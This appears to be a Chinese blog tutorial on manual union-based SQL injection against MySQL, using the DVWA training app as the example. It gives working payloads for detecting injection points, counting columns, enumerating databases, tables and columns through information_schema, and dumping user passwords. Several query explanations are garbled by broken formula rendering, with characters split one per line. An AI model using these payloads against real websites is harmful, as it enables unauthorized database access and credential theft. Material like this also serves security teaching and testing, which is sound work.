需要知道的知识点:
ORDER BY函数
concat_ws函数
group_concat函数
MySQL模糊查询
SQL注入中的显示位
SQL注入必记的一库三表
mysql的基本命令
注入的步骤:
- 判断注入点
- 判断查询列数
- 判断显示位
- 获取数据库基本信息
- 获取数据
一、判断注入点:
原理
寻找需要后台处理后提交给数据库的点;只要我们的输入会和数据库交互,那么就有可能产生注入点;我们应用注入点进行语句注入来获取需要的信息
注入方法
a)加入单引号提交
如果出现错误这说明网站可能存在注入点
b)数字型判断是否有注入点
输入语句:and 1=1、and 1=2
原理:
s
q
l
=
"
s
e
l
e
c
t
∗
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
sql="select * from users where id=
sql="select∗fromuserswhereid=uid"
如果返回不同的页面这说明可能存在注入点
c)字符型判断是否有注入点
输入语句:’ and ‘1’ = ‘1、’ and ‘1’ = ‘2’
原理:
s
q
l
=
"
s
e
l
e
c
t
∗
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
′
sql="select * from users where id='
sql="select∗fromuserswhereid=′uid’"
如果返回不同的页面这说明可能存在注入点
d)搜索型判断是否有注入点
输入语句:xxx%’ or 1=1
先搜索’(单引号)如果出错这说明可能存在注入点,输入%(百分号)返回正常,则可能性更大。
原理:
s
q
l
=
"
s
e
l
e
c
t
∗
f
r
o
m
u
s
e
r
w
h
e
r
e
p
a
s
s
w
o
r
d
l
i
k
e
′
sql="select * from user where password like '%
sql="select∗fromuserwherepasswordlike′pwd%’ order by password";
这里的like '%pwd%'是模糊查询
二、判断多少列
用order by函数来检测有多少列。
原理:order by函数后面跟的参数可以用数字代替,代表查的第几列,从1开始一直用order by 向后查询,当到n报错的时候停止,这就有n-1列
三、判断显示位
概念:在一个网站的正常页面,服务器端执行SQL语句查询数据库的数据,客户端将数据展示在页面中,展示数据的位置就叫做显示位
原理:用UNION将查询结果合并,让前面的查询结果为空,只留下一个查询结果。
输入语句:-1’ union select 1,2,3 #根据上面order by得出的数据来增加数字
四、显示数据库基本信息
原因
需要知道数据库的基本信息,才能针对注入
获取方法
a)显示当前数据库名
输入语句:-1’ union select 1,(select database()) %23
原理:database()函数的功能是显示当前使用的数据库,-1是让前面的id查询值为空,%23是url编码中的#
b)显示有哪些数据库
输入语句:-1’ union select 1,(select group_concat(schema_name) from information_schema.schemata) %23
原理:group_concat函数:将查询到的数据拼接(括号中的参数为查询的表)
c)显示数据库下有哪些表
输入语句:-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = ‘dvwa’) %23
原理:dvwa是个例子,我们知道库名之后,可以根据库名查询表名,dvwa就是我们知道的库名
d)判断表中有哪些字段
输入语句:-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = ‘dvwa’ and table_name = ‘users’) %23
原理:根据属于的数据库和数据表的名称判断。
五、获取数据表中的数据
输入语句:-1’ union select 1,(select group_concat(concat_ws("~",user,password)) from dvwa.users) %23
原理:concat_ws函数是拼接函数,用第一个参数拼接后面的参数。
知识点列表:
SQL注入必记的一库三表:
information_schema(数据库)(MySQL中默认的数据库)
SCHEMATA(表):存储了MySQL下每一个数据库的相关信息
schema_name(字段):数据库名
TABLES(表):存储了MySQL下每一个表的相关信息
TABLE_NAME(字段):数据表名称
TABLE_SCHEMA(字段):该数据表属于哪一个数据库
COLUMNS(库):存储了MySQL下每一个数据表中的所有列名(字段名)
COLUMN_NAME(字段):字段名称
TABLE_NAME(字段):该字段属于哪一个数据表
TABLE_SCHEMA(字段):当前字段所属数据表所在的数据库名称
注意:这三张表都是在information_schema数据库下面的,因此注入中不能直接使用表名,而是需要使用”数据库.数据表名”的形式
group_concat函数:
查询参数中的表的数据,并且用逗号拼接
concat_ws函数:
拼接函数,第一个参数是拼接所用的字符,后面的参数是需要拼接的数据的列名
ORDER BY函数:
order by对结果集进行排序,后面跟的参数应该是列名,如:
SELECT Company, OrderNumber FROM Orders ORDER BY Company
当然可以用整数代替,表示第几列,如:
SELECT Company, OrderNumber FROM Orders ORDER BY 1
说实话,优快云用着真的不如语雀舒服……
扫一扫
589
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
